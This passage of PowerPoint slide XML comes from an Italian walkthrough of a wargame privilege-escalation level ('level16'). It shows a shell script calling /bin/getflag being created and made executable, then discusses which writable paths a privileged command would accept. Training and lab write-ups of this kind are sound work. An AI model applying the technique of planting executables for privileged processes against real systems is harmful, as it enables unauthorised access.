          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{866FC978-E115-4F54-DA25-3E5E87BB8D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881053" y="2388665"/>
            <a:ext cx="7902729" cy="50579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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Scriviamo all’interno del file:</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>$ nano SOLUZIONE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{578D5F7F-41BE-0DD9-EED2-245ABB4FB181}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881053" y="3009719"/>
            <a:ext cx="7802395" cy="101635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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Visualizziamo il contenuto</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>cat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> SOLUZIONE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#!/bin/sh</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/bin/getflag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00CFBE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00CFBE"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{240E53DD-90F4-83C5-1581-3C1ACD4A943F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="881053" y="4138043"/>
            <a:ext cx="8070187" cy="50579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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>4. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Impostiamo i permessi di esecuzione per flag16:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2">
                    <a:lumMod val="75000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> +x SOLUZIONE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206133797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additive="base">
                                        <p:cTn id="12"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6">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>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 calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="22"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7">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="7">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="26"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2">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="32" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:tx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2">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>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2">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="37" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="38" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="40" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="42" presetID="2" presetClass="entr" presetSubtype="2" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2">
                                            <p:txEl>
                                              <p:pRg st="3" end="3"/>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8" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="50"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51" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="52" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="4">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="55"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450" name="Google Shape;1450;p54"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="474832"/>
            <a:ext cx="77040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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1408693" y="499658"/>
            <a:ext cx="64122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it-IT" sz="3200"/>
              <a:t>soluzione</a:t>
            </a:r>
            <a:endParaRPr sz="3200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="1468" name="Google Shape;1468;p54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7631947" y="649694"/>
            <a:ext cx="636814" cy="120078"/>
            <a:chOff x="8209059" y="198000"/>
            <a:chExt cx="636814" cy="120078"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1469" name="Google Shape;1469;p54"/>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4"/>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4"/>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1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{877D37DB-FB3A-72A7-5ABB-F02B538D2D79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714799" y="1119494"/>
            <a:ext cx="7572169" cy="56048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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Ora il problema è dove inserire questo script. Come utente level16 abbiamo i permessi di scrittura solo nelle cartelle /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> e /level16. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>\</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10C8B97F-4098-14DB-2474-AF69D5C7641E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="744518" y="2579851"/>
            <a:ext cx="7404204" cy="56048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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Ma queste due cartelle sono in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00CFBE"/>
                </a:solidFill>
              </a:rPr>
              <a:t>minuscolo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> quindi il</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" b="1" dirty="0"/>
              <a:t> path </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>non verrebbe riconosciuto dal comando. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Google Shape;1441;p53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C879B3DE-8EA1-CE62-519F-67E436E6A97B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762793" y="3316912"/>
            <a:ext cx="7704000" cy="56048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152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t>Inoltre non possiamo neanche creare noi una cartella in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="F99AAA"/>
                </a:solidFill>
              </a:rPr>
              <a:t>maiuscolo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1400" dirty="0"/>
              <a:t> in quanto servirebbero i permessi di root. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400" indent="0">
              <a:buFont typeface="Livvic"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Immagine 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FFB0A524-79EE-9AAB-6269-53A84D2850A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1649597" y="1659722"/>
            <a:ext cx="6102389" cy="252355"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Immagine 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
